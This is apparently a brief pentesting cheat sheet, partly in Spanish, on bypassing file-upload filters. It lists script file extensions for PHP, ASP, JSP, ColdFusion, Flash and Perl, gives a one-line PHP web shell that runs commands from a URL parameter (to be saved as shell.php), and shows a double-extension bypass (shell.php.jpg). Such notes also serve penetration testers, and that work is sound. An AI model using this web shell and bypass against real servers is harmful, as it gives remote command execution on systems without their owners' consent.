▶ Common File Extensions:
  # PHP
  PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
  # Working in PHPv8
  PHPv8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp
  # ASP
  ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
  # JSP
  JSP: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
  # Coldfusion
  Coldfusion: .cfm, .cfml, .cfc, .dbm
  # Flash
  Flash: .swf
  # Perl
  Perl: .pl, .cgi

▶ Payload PHP ejecución de comandos:
  <?php system($_GET['cmd']); ?>  # Guardar como shell.php

▶ Bypass con Doble Extensión:
  shell.php.jpg
